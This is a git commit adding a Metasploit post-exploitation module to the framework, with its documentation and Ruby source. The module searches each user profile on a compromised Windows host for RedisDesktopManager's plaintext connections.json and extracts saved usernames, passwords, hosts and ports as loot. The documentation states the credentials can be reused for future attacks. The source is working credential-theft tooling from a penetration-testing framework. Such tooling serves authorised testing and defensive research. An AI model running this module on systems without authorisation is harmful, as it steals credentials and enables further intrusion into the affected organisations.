Land #17006, Gather_RedisDesktopManager_Password

Merge branch 'land-17006' into upstream-master
This commit is contained in:
bwatters
2022-10-03 15:10:30 -05:00
2 changed files with 139 additions and 0 deletions
@@ -0,0 +1,46 @@
## Vulnerable Application
[RedisDesktopManager](https://github.com/uglide/RedisDesktopManager) stores its credentials
in a JSON file in plaintext. This module allow users who have successfully compromised a machine
running RedisDesktopManager to extract these credentials from the compromised system so that they can be reused
for future attacks or for password analysis.
### Setup Steps
1. Download the latest installer of RedisdDesktopManager from https://github.com/uglide/RedisDesktopManager/releases.
However you need to be subscribed to be able to run these editions. Therefore it is recommended that you download the Windows version from https://github.com/lework/RedisDesktopManager-Windows/releases and use these for testing if you don't have an existing Redis subscription.
2. Run the installer, follow the prompts, and select all the default settings.
3. Once everything has been installed, start RedisDesktopManager and click on `Connect To Redis Server`.
4. Click `OK` after filling in the connection information, including the username and password to log into the Redis server as.
## Verification Steps
1. `msfconsole`
2. Get a Meterpreter session on a Windows system
3. `use post/windows/gather/credentials/redis_desktop_manager`
4. `set SESSION <session number of the Meterpreter session>`
5. `run`
6. Verify that the module was able to extract the connection credentials you entered during the `Setup Steps` phrase.
## Options
### REGEX
Users can set their own regular expressions that will be utilized to
determine which credentials to extract. The default is set to `^password`.
### VERBOSE
By default this option is turned off. When turned on, the module will show information on files
which aren't extracted and information that is not directly related to the artifact output.
### STORE_LOOT
This option is turned on by default and will cause the module to save
the stolen artifacts/files to the loot files on the machine running Metasploit.
This is required for extracting credentials from files using regexp,
JSON, XML, and SQLite queries.
### EXTRACT_DATA
This option is turned on by default and will perform the data extraction using the
predefined regular expression. The `STORE_LOOT` option must be turned on in
order for this to work.
## Scenarios
@@ -0,0 +1,93 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
# this associative array defines the artifacts known to PackRat
include Msf::Post::File
include Msf::Post::Windows::UserProfiles
include Msf::Post::Windows::Packrat
ARTIFACTS =
{
application: 'redis_desktop_manager',
app_category: 'redis',
gatherable_artifacts: [
{
filetypes: 'logins',
path: 'ProfileDir',
dir: '.rdm',
artifact_file_name: 'connections.json',
description: "RedisDesktopManager's saved Username and Password ",
credential_type: 'json',
json_search: [
{
json_parent: '',
json_children: [
"['name']",
"['username']",
"['auth']",
"['host']",
"['port']",
]
}
]
}
]
}.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'RedisDesktopManager credential gatherer',
'Description' => %q{
PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
Further details can be found in the module documentation.
This is a module that searches for RedisDesktopManager credentials on a windows remote host.
},
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://blog.kali-team.cn/Metasploit-PackRat-RedisDesktopManager-42dc7ab063f040d182da0f1fc16db74e' ]
],
'Author' => [
'Kali-Team'
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => []
}
)
)
register_options(
[
OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
# enumerates the options based on the artifacts that are defined below
OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
]
)
end
def run
print_status('Filtering based on these selections: ')
print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
# used to grab files for each user on the remote host
grab_user_profiles.each do |userprofile|
run_packrat(userprofile, ARTIFACTS)
end
print_status 'PackRat credential sweep Completed'
end
end